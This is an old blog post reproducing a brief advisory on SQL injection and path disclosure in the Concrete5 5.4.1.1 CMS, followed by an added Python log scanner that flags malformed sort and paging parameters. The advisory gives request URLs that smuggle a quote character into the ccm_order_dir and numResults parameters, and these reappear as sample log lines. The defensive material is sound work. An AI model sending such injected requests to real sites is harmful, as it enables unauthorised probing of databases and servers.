Saturday 19 November 2011

SQLi/Info Disclo in Concrete 5.4.11


Another old bug...

# --------------------------------------------------------------------------- #
# - Title      : SQL Injection/Info Disclosure in Concrete 5.4.11
# - Tested on      : Ubuntu
# - Date      : 3o.o3.2o11
# - Download Link : sourceforge.net
# - Author      : ;)
# - Greetz      :
# --------------------------------------------------------------------------- #

1. Log in to CMS.
2. Go to:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000
3. That's it!

* path disclo is also here:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=aaa&numResults=%22&searchField=&selectedSearchField[]=&ccm-search-files=Search
# regards,
# .
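For the defensive side, here is an added example (not part of the original advisory and not concrete5 code) that scans web access logs for requests to this endpoint whose sort or paging parameters fall outside an allow-list. The allowed value shapes (`asc`/`desc`, a bare column identifier, a short integer) and the log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint path as it appears in the advisory URLs.
ENDPOINT = "/tools/required/files/search_results"

# Assumed legitimate value shapes (not taken from the concrete5 source).
RULES = {
    "ccm_order_dir": re.compile(r"(asc|desc)?", re.IGNORECASE),
    "ccm_order_by": re.compile(r"([A-Za-z_][A-Za-z0-9_]*)?"),
    "numResults": re.compile(r"\d{0,4}"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Nov/2011:10:00:01 +0000] "GET /concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000 HTTP/1.1" 200 512
192.0.2.11 - - [19/Nov/2011:10:00:07 +0000] "GET /concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&ccm_order_dir=&ccm_order_by=&fKeywords=aaa&numResults=%22 HTTP/1.1" 200 512
192.0.2.12 - - [19/Nov/2011:10:00:09 +0000] "GET /concrete5.4.1.1/index.php/tools/required/files/search_results?ccm_order_by=fDateAdded&ccm_order_dir=desc&numResults=10 HTTP/1.1" 200 512
""".splitlines()


def check_request(target):
    """Return (param, decoded value) pairs that violate RULES for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return []
    # keep_blank_values: empty parameters are legal here and must still be seen.
    params = parse_qs(parts.query, keep_blank_values=True)
    return [
        (name, value)
        for name, rule in RULES.items()
        for value in params.get(name, [])
        if not rule.fullmatch(value)
    ]


def scan(lines):
    """Return (client address, violations) for every log line with a bad parameter."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        hits = check_request(match.group(1)) if match else []
        if hits:
            findings.append((line.split()[0], hits))
    return findings


if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

The same allow-list belongs in the application itself: a sort direction cannot be passed as a bound SQL parameter, so it has to be mapped to a fixed `ASC`/`DESC` before it reaches the query.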
